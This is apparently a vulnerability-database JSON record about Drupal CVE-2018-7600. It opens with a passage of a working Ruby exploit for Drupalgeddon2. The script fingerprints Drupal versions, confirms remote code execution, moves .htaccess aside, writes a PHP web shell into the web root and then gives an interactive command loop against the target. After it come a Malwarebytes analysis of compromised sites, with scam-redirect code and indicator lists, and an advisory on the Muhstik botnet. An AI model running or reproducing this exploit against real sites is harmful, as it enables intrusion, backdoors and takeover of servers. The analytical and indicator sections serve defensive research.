https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x\r\n puts warning(\"WARNING: Unable to detect keyword 'drupal.org'\") if not response.body.downcase.include? \"drupal.org\"\r\n\r\n # Patched already? (For Drupal v8.4.x / v7.x)\r\n puts warning(\"WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\") if response.body.include? \"SA-CORE-2018-002\"\r\n\r\n # Try and get version from the file contents (For Drupal v8.4.x / v7.x)\r\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\r\n\r\n # Blank if not valid\r\n $drupalverion = \"\" if not $drupalverion[-1] =~ /\\d/\r\n end\r\n\r\n # Check meta tag\r\n if not response.body.empty?\r\n # For Drupal v8.x / v7.x\r\n meta = response.body.match(/<meta name=\"Generator\" content=\"Drupal (.*) /)\r\n metatag = meta.to_s.slice(/meta name=\"Generator\" content=\"Drupal (.*) \\(http/, 1).to_s.strip\r\n\r\n if not metatag.empty?\r\n $drupalverion = \"#{metatag}.x\" if $drupalverion.empty?\r\n puts success(\"Metatag: v#{$drupalverion} [Generator]\")\r\n puts verbose(meta.to_s) if $verbose\r\n end\r\n end\r\n\r\n # Done! ...if a full known version, else keep going... may get lucky later!\r\n break if not $drupalverion.end_with?(\"x\") and not $drupalverion.empty?\r\n end\r\n\r\n # Check request response, not allowed\r\n if response.code == \"403\" and $drupalverion.empty?\r\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\r\n puts success(\"Found : #{uri} (HTTP Response: #{response.code})#{tmp}\")\r\n\r\n if $drupalverion.empty?\r\n # Try and get version from the URL (For Drupal v.7.x/v6.x)\r\n $drupalverion = uri.match(/includes\\/database.inc/)? \"7.x/6.x\" : \"\" if $drupalverion.empty?\r\n # Try and get version from the URL (For Drupal v8.x)\r\n $drupalverion = uri.match(/core/)? \"8.x\" : \"\" if $drupalverion.empty?\r\n\r\n # If we got something, show it!\r\n puts success(\"URL : v#{$drupalverion}?\") if not $drupalverion.empty?\r\n end\r\n\r\n else\r\n tmp = $verbose ? \" [HTTP Size: #{response.size}]\" : \"\"\r\n puts warning(\"MISSING: #{uri} (HTTP Response: #{response.code})#{tmp}\")\r\n end\r\nend\r\n\r\n\r\n# Feedback\r\nif not $drupalverion.empty?\r\n status = $drupalverion.end_with?(\"x\")? \"?\" : \"!\"\r\n puts success(\"Drupal#{status}: v#{$drupalverion}\")\r\nelse\r\n puts error(\"Didn't detect Drupal version\")\r\n exit\r\nend\r\n\r\nif not $drupalverion.start_with?(\"8\") and not $drupalverion.start_with?(\"7\")\r\n puts error(\"Unsupported Drupal version (#{$drupalverion})\")\r\n exit\r\nend\r\nputs \"-\"*80\r\n\r\n\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n\r\n# The attack vector to use\r\n$form = $drupalverion.start_with?(\"8\")? \"user/register\" : \"user/password\"\r\n\r\n# Make a request, check for form\r\nurl = \"#{$target}?q=#{$form}\"\r\nputs action(\"Testing: Form (#{$form})\")\r\nresponse = http_request(url, 'get', '', $session_cookie)\r\nif response.code == \"200\" and not response.body.empty?\r\n puts success(\"Result : Form valid\")\r\nelsif response['location']\r\n puts error(\"Target is NOT exploitable [5] (HTTP Response: #{response.code})... Could try following the redirect: #{response['location']}\")\r\n exit\r\nelsif response.code == \"404\"\r\n puts error(\"Target is NOT exploitable [4] (HTTP Response: #{response.code})... Form disabled?\")\r\n exit\r\nelsif response.code == \"403\"\r\n puts error(\"Target is NOT exploitable [3] (HTTP Response: #{response.code})... Form blocked?\")\r\n exit\r\nelsif response.body.empty?\r\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\r\n exit\r\nelse\r\n puts warning(\"WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})\")\r\nend\r\n\r\n\r\nputs \"- \"*40\r\n\r\n\r\n# Make a request, check for clean URLs status ~ Enabled: /user/register Disabled: /?q=user/register\r\n# Drupal v7.x needs it anyway\r\n$clean_url = $drupalverion.start_with?(\"8\")? \"\" : \"?q=\"\r\nurl = \"#{$target}#{$form}\"\r\n\r\nputs action(\"Testing: Clean URLs\")\r\nresponse = http_request(url, 'get', '', $session_cookie)\r\nif response.code == \"200\" and not response.body.empty?\r\n puts success(\"Result : Clean URLs enabled\")\r\nelse\r\n $clean_url = \"?q=\"\r\n puts warning(\"Result : Clean URLs disabled (HTTP Response: #{response.code})\")\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n\r\n # Drupal v8.x needs it to be enabled\r\n if $drupalverion.start_with?(\"8\")\r\n puts error(\"Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE\")\r\n exit\r\n elsif $drupalverion.start_with?(\"7\")\r\n puts info(\"Isn't an issue for Drupal v7.x\")\r\n end\r\nend\r\nputs \"-\"*80\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Values in gen_evil_url for Drupal v8.x\r\nelementsv8 = [\r\n \"mail\",\r\n \"timezone\",\r\n]\r\n# Values in gen_evil_url for Drupal v7.x\r\nelementsv7 = [\r\n \"name\",\r\n]\r\n\r\nelements = $drupalverion.start_with?(\"8\") ? elementsv8 : elementsv7\r\n\r\nelements.each do|e|\r\n $element = e\r\n\r\n # Make a request, testing code execution\r\n puts action(\"Testing: Code Execution (Method: #{$element})\")\r\n\r\n # Generate a random string to see if we can echo it\r\n random = (0...8).map { (65 + rand(26)).chr }.join\r\n url, payload = gen_evil_url(\"echo #{random}\", e)\r\n\r\n response = http_request(url, \"post\", payload, $session_cookie)\r\n if (response.code == \"200\" or response.code == \"500\") and not response.body.empty?\r\n result = clean_result(response.body)\r\n if not result.empty?\r\n puts success(\"Result : #{result}\")\r\n\r\n if response.body.match(/#{random}/)\r\n puts success(\"Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\")\r\n break\r\n\r\n else\r\n puts warning(\"WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result\")\r\n end\r\n\r\n else\r\n puts warning(\"WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... Didn't detect any INJECTED output (disabled PHP function?)\")\r\n end\r\n\r\n puts warning(\"WARNING: Target MIGHT be exploitable [5]... Blind attack?\") if response.code == \"500\"\r\n\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n puts verbose(\"clean_result: #{result}\") if not result.empty? and $verbose\r\n\r\n elsif response.body.empty?\r\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\r\n exit\r\n\r\n else\r\n puts error(\"Target is NOT exploitable [1] (HTTP Response: #{response.code})\")\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n exit\r\n end\r\n\r\n puts \"- \"*40 if e != elements.last\r\nend\r\n\r\nputs \"-\"*80\r\n\r\n\r\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n# Location of web shell & used to signal if using PHP shell\r\nwebshellpath = \"\"\r\nprompt = \"drupalgeddon2\"\r\n\r\n# Possibles paths to try\r\npaths = [\r\n # Web root\r\n \"\",\r\n # Required for setup\r\n \"sites/default/\",\r\n \"sites/default/files/\",\r\n # They did something \"wrong\", chmod -R 0777 .\r\n #\"core/\",\r\n]\r\n# Check all (if doing web shell)\r\npaths.each do|path|\r\n # Check to see if there is already a file there\r\n puts action(\"Testing: Existing file (#{$target}#{path}#{webshell})\")\r\n\r\n response = http_request(\"#{$target}#{path}#{webshell}\", 'get', '', $session_cookie)\r\n if response.code == \"200\"\r\n puts warning(\"Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***\")\r\n else\r\n puts info(\"Response: HTTP #{response.code} // Size: #{response.size}\")\r\n end\r\n\r\n puts \"- \"*40\r\n\r\n\r\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n\r\n folder = path.empty? ? \"./\" : path\r\n puts action(\"Testing: Writing To Web Root (#{folder})\")\r\n\r\n # Merge locations\r\n webshellpath = \"#{path}#{webshell}\"\r\n\r\n # Final command to execute\r\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\r\n\r\n # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess\r\n # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess\r\n if path == \"sites/default/files/\"\r\n puts action(\"Moving : ./sites/default/files/.htaccess\")\r\n cmd = \"mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}\"\r\n end\r\n\r\n # Generate evil URLs\r\n url, payload = gen_evil_url(cmd, $element)\r\n # Make the request\r\n response = http_request(url, \"post\", payload, $session_cookie)\r\n # Check result\r\n if response.code == \"200\" and not response.body.empty?\r\n # Feedback\r\n result = clean_result(response.body)\r\n puts success(\"Result : #{result}\") if not result.empty?\r\n\r\n # Test to see if backdoor is there (if we managed to write it)\r\n response = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=hostname\", $session_cookie)\r\n if response.code == \"200\" and not response.body.empty?\r\n puts success(\"Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\")\r\n break\r\n\r\n elsif response.code == \"404\"\r\n puts warning(\"Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?\")\r\n\r\n elsif response.code == \"403\"\r\n puts warning(\"Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\r\n\r\n elsif response.body.empty?\r\n puts warning(\"Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... Got an empty response back\")\r\n\r\n else\r\n puts warning(\"Target is NOT exploitable [2-1] (HTTP Response: #{response.code})\")\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n end\r\n\r\n elsif response.code == \"500\" and not response.body.empty?\r\n puts warning(\"Target MAY of been exploited... Bit of blind leading the blind\")\r\n break\r\n\r\n elsif response.code == \"404\"\r\n puts warning(\"Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?\")\r\n\r\n elsif response.code == \"403\"\r\n puts warning(\"Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\r\n\r\n elsif response.body.empty?\r\n puts warning(\"Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back\")\r\n\r\n else\r\n puts warning(\"Target is NOT exploitable [1-1] (HTTP Response: #{response.code})\")\r\n puts verbose(\"response.body: #{response.body}\") if $verbose\r\n end\r\n\r\n webshellpath = \"\"\r\n\r\n puts \"- \"*40 if path != paths.last\r\nend if try_phpshell\r\n\r\n# If a web path was set, we exploited using PHP!\r\nif not webshellpath.empty?\r\n # Get hostname for the prompt\r\n prompt = response.body.to_s.strip if response.code == \"200\" and not response.body.empty?\r\n\r\n puts \"-\"*80\r\n puts info(\"Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'\")\r\n# Should we be trying to call commands via PHP?\r\nelsif try_phpshell\r\n puts warning(\"FAILED : Couldn't find a writeable web path\")\r\n puts \"-\"*80\r\n puts action(\"Dropping back to direct OS commands\")\r\nend\r\n\r\n\r\n# Stop any CTRL + C action ;)\r\ntrap(\"INT\", \"SIG_IGN\")\r\n\r\n\r\n# Forever loop\r\nloop do\r\n # Default value\r\n result = \"~ERROR~\"\r\n\r\n # Get input\r\n command = Readline.readline(\"#{prompt}>> \", true).to_s\r\n\r\n # Check input\r\n puts warning(\"WARNING: Detected an known bad character (>)\") if command =~ />/\r\n\r\n # Exit\r\n break if command == \"exit\"\r\n\r\n # Blank link?\r\n next if command.empty?\r\n\r\n # If PHP web shell\r\n if not webshellpath.empty?\r\n # Send request\r\n result = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=#{command}\", $session_cookie).body\r\n # Direct OS commands\r\n else\r\n url, payload = gen_evil_url(command, $element, true)\r\n response = http_request(url, \"post\", payload, $session_cookie)\r\n\r\n # Check result\r\n if not response.body.empty?\r\n result = clean_result(response.body)\r\n end\r\n end\r\n\r\n # Feedback\r\n puts result\r\nend", "sourceHref": "https://www.exploit-db.com/download/44449", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2018-06-05T16:04:05", "description": "Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. In late March 2018, Drupal was affected by a major remote code execution vulnerability ([CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)) followed by yet another ([CVE-2018-7602](<https://www.drupal.org/sa-core-2018-004>)) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.\n\nThese back-to-back vulnerabilities were accompanied by proof of concepts that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production.\n\nRolling out a CMS is usually the easy part. Maintaining it is where most problems occur due to lack of knowledge, fear of breaking something, and, of course, costs. While this is an earned responsibility for each site owner to do due diligence with their web properties, the outcome is typically websites being severely out of date and exploited, often more than once.\n\n### Sample set and web crawl\n\nWe decided to choose a number web properties that had not yet been validated (including all versions of Drupal, vulnerable or not). Our main source of URLs came from [Shodan](<https://www.shodan.io/>) and was complemented by [PublicWWW](<https://publicwww.com/>), for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites quickly into the process and were able to confirm around [900 injected web properties](<https://pastebin.com/GCWiSpa3>).\n\nMany of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/Crawl.png> \"\" )\n\n_Figure 1: Crawling and flagging compromised Drupal sites using Fiddler_\n\n### Drupal versions\n\nAt the time of this writing, there are two [recommended releases](<https://www.drupal.org/project/drupal>) for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/releases_.png> \"\" )\n\n_Figure 2: Drupal's two main supported branches_\n\nAlmost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in [August 2015](<https://www.drupal.org/project/drupal/releases/7.39>). Many security flaws have been discovered (and exploited) since then.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats1.png> \"\" )\n\n_Figure 3: Percentage of compromised sites belonging to a particular Drupal version_\n\n### Payloads\n\nA large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with [XMRig cryptocurrency miners](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>). However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.\n\nUnsurprisingly, web miners were by far the most common type of injection we noticed. But we also came across a few different social engineering campaigns.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats2.png> \"\" )\n\n_Figure 4: Breakdown of the most common payloads_\n\n#### Web miners\n\n[Drive-by mining attacks](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) went though the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It's safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.\n\nWe are seeing the same campaign that was [already documented](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>) by other researchers in early March and is ensnaring more victims by the day.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/coinhive_uni.png> \"\" )\n\n_Figure 5: A subdomain of Harvard University's main site mining Monero_\n\n#### Fake updates\n\nThis campaign of fake browser updates we [documented earlier](<https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/>) is still going strong. It distributes a password stealer of Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/FakeUpdates.png> \"\" )\n\n_Figure 6: A compromised Drupal site pushing a fake Chrome update_\n\n#### Tech support scams (browlocks)\n\nRedirections to browser locker pages\u2014a typical approach for unveiling tech support scams. The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.\n \n \n mysimplename[.]com/si.php\n window.location.replace(\"http://hispaintinghad[.]tk/index/?1641501770611\");\n window.location.href = \"http://hispaintinghad[.]tk/index/?1641501770611\";\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/TSS_redirection.png> \"\" )\n\n_Figure 7: A compromised Drupal host redirecting to a browser locker page_\n\n### Web miners and injected code\n\nWe collected different types of code injection, from simple and clear text to long obfuscated blurbs. It\u2019s worth noting that in many cases the code is dynamic\u2014most likely a technique to evade detection.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/miner_injections.png> \"\" )\n\n_Figure 8: Collage of some of the most common miner injections_\n\n### Snapshots\n\nThe following are some examples of compromised sites sorted by category. We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/uni1.png> \"\" )\n\n_Figure 9: Education (University of Southern California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/gov1.png> \"\" )\n\n_Figure 10: Government (Arkansas Courts & Community Initiative)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/political.png> \"\" )\n\n_Figure 11: Political party (Green Party of California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/reviveadserver.png> \"\" )\n\n_Figure 12: Ad server (Indian TV Revive Ad server)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/religious.png> \"\" )\n\n_Figure 13: Religion (New Holly Light)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/health_.png> \"\" )\n\n_Figure 14: Health (NetApp Benefits)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/conf.png> \"\" )\n\n_Figure 15: Conferences (Red Hat partner conference) _\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/tech.png> \"\" )\n\n_Figure 16: Tech (ComputerWorld's Brazilian portal)_\n\n### Malicious cryptomining remains hot\n\nIt is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.\n\nCompromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) continues to detect and block malicious cryptomining and other unwanted redirections.\n\n### Indicators of compromise\n\n**Coinhive**\n\n-> URIs\n \n \n cnhv[.]co/1nt9z\n coinhive[.]com/lib/coinhive.min.js\n coinhive[.]com/lib/cryptonight.wasm\n coinhive[.]com/lib/worker-asmjs.min.js?v7\n ws[0-9]{3}.coinhive[.]com/proxy\n\n-> Site keys\n \n \n CmGKP05v2VJbvj33wzTIayOv6YGLkUYN\n f0y6O5ddrXo1be4NGZubP1yHDaWqyflD\n kAdhxvdilslXbzLAEjFQDAZotIVm5Jkf\n MKr3Uf5CaT88pcqzAXltkBu4Us5gHWaj\n NL9TTsyGeVU8FbKR9fUvwkwU4qPJ4Z2I\n no2z8X4wsiouyTmA9xZ0TyUdegWBw2yK\n oHaQn8uDJ16fNhcTU7y832cv49PqEvOS\n PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf\n RYeWLxbPVlfPNsZUh231aLXoYAdPguXY\n XoWXAWvizTNnyia78qTIFfATRgcbJfGx\n YaUkuGZ3pmuPVsBMDxSgY45DwuBafGA3\n\n**Crypto-Loot**\n\n-> URI\n \n \n cryptaloot[.]pro/lib/justdoit2.js\n\n-> Keys\n \n \n 48427c995ba46a78b237c5f53e5fef90cd09b5f09e92\n 6508a11b897365897580ba68f93a5583cc3a15637212\n d1ba2c966c5f54d0da15e2d881b474a5091a91f7c702\n\n**EthPocket**\n \n \n eth-pocket[.]com:8585\n eth-pocket[.]de/perfekt/perfekt.js\n\n**JSECoin**\n \n \n jsecoin[.]com/platform/banner1.html?aff1564&utm_content=\n\n**DeepMiner**\n \n \n greenindex.dynamic-dns[.]net/jqueryeasyui.js\n\n**Other CryptoNight-based miner**\n \n \n cloudflane[.]com/lib/cryptonight.wasm\n\n**FakeUpdates**\n \n \n track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba\n click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3\n 185.244.149[.]74\n 5.9.242[.]74\n\n**Tech scams**\n \n \n 192.34.61[.]245\n 192.81.216[.]165\n 193.201.224[.]233\n 198.211.107[.]153\n 198.211.113[.]147\n 206.189.236[.]91\n 208.68.37[.]2\n addressedina[.]tk\n andtakinghis[.]tk\n andweepover[.]tk\n asheleaned[.]tk\n baserwq[.]tk\n blackivory[.]tk\n blownagainst[.]tk\n cutoplaswe[.]tk\n dearfytr[.]tk\n doanythingthat[.]tk\n faithlessflorizel[.]tk\n grey-plumaged[.]tk\n haddoneso[.]tk\n handkerchiefout[.]tk\n himinspectral[.]tk\n hispaintinghad[.]tk\n ifheisdead[.]tk\n itshandupon[.]tk\n iwouldsay[.]tk\n leadedpanes[.]tk\n millpond[.]tk\n mineofcourse[.]tk\n momentin[.]tk\n murdercould[.]tk\n mysimplename[.]com\n nearlythrew[.]tk\n nothinglikeit[.]tk\n oncecommitted[.]tk\n portraithedid[.]tk\n posingfor[.]tk\n secretsoflife[.]tk\n sendthemany[.]tk\n sputteredbeside[.]tk\n steppedforward[.]tk\n sweeppast[.]tk\n tellingmeyears[.]tk\n terriblehope[.]tk\n thatwonderful[.]tk\n theattractions[.]tk\n thereisnodisgrace[.]tk\n togetawayt[.]tk\n toseethem[.]tk\n wickedwere[.]tk\n withaforebodingu[.]tk\n\nThe post [A look into Drupalgeddon's client-side attacks](<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-18T15:00:00", "type": "malwarebytes", "title": "A look into Drupalgeddon\u2019s client-side attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-18T15:00:00", "id": "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "githubexploit": [{"lastseen": "2021-12-10T14:32:49", "description": "# drupal8-REST-RCE\nCVE-2019-6340 drupal8-REST-RCE (/node/1) , CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-08-31T22:55:18", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Drupal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6340", "CVE-2018-7600"], "modified": "2020-11-24T15:41:16", "id": "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "hivepro": [{"lastseen": "2022-03-29T16:43:01", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Muhstik malware has begun attacking Redis Servers by exploiting a recently reported vulnerability, CVE-2022-0543. This flaw can be found in several Redis Debian packages. The attack began on March 11, 2022, and was carried out by a threat actor who targeted Confluence servers in September 2021 and Log4j in December. The payload is a Muhstik bot variation that may be used to perform DDOS assaults. The threat actor first executes the Lua scripts to exploit the vulnerability found in Redis Debian servers. The threat actor attempts to download "Russia.sh" from "106[.]246.224.219" using wget or curl. It stores it as "/tmp/russ" and runs it which will download and run Linux payload from 160[.]16.58.163. These binaries have been recognized as Muhstik bot variants. This botnet then connects to an IRC server to receive commands that download files, run shell commands, and carry out attacks like flood attacks and SSH brute force attacks. The Mitre TTPs commonly used by Muhstik malware are: TA0001: Initial Access TA0011: Command and Control TA0042: Resource Development TA0008: Lateral Movement T1071: Application Layer Protocol T1588.006: Obtain Capabilities: Vulnerabilities T1190: Exploit Public-Facing Application T1021.004: Remote Services: SSH T1059.004: Command and Scripting Interpreter: Unix Shell Vulnerability Details Indicators of Compromise (IoCs) Patch Links http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html https://security-tracker.debian.org/tracker/CVE-2022-0543 http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html https://github.com/g0rx/CVE-2018-7600-Drupal-RCE https://jira.atlassian.com/browse/CONFSERVER-67940 https://logging.apache.org/log4j/2.x/manual/migration.html References https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T12:17:03", "type": "hivepro", "title": "Muhstik botnet adds another vulnerability exploit to its arsenal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2019-2725", "CVE-2022-0543"], "modified": "2022-03-29T12:17:03", "id": "HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675", "href": "https://www.hivepro.com/muhstik-malware-botnet-adds-another-vulnerability-exploit-to-its-arsenal/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2018-08-03T12:56:42", "description": "What publicly available Vulnerability Databases do we have? Well, I can only say that there are a lot of them and they are pretty different. Here I make an attempt to classify them.\n\nIt's quite an ungrateful task. No matter how hard you try, the final result will be rather inaccurate and incomplete. I am sure someone will be complaining. But this is how I see it.  If you want to add or change something feel free to make a comment bellow or email [me@avleonov.com](<mailto:me@avleonov.com>).\n\nThe main classifier, which I came up with:\n\n * There are individual vulnerability databases in which one identifier means one vulnerability. They try to cover all existing vulnerabilities.\n * And others are security bulletins. They cover vulnerabilities in a particular product or products. And they usually based on on patches. One patch may cover multiple vulnerabilities.\n\nI made this diagram with some Vulnerability Databases. Note that I wanted to stay focused, so there are no exploit DBs, CERTs, lists of vulnerabilities detected by some researchers ([CISCO Talos](<https://www.talosintelligence.com/vulnerability_info>), [PT 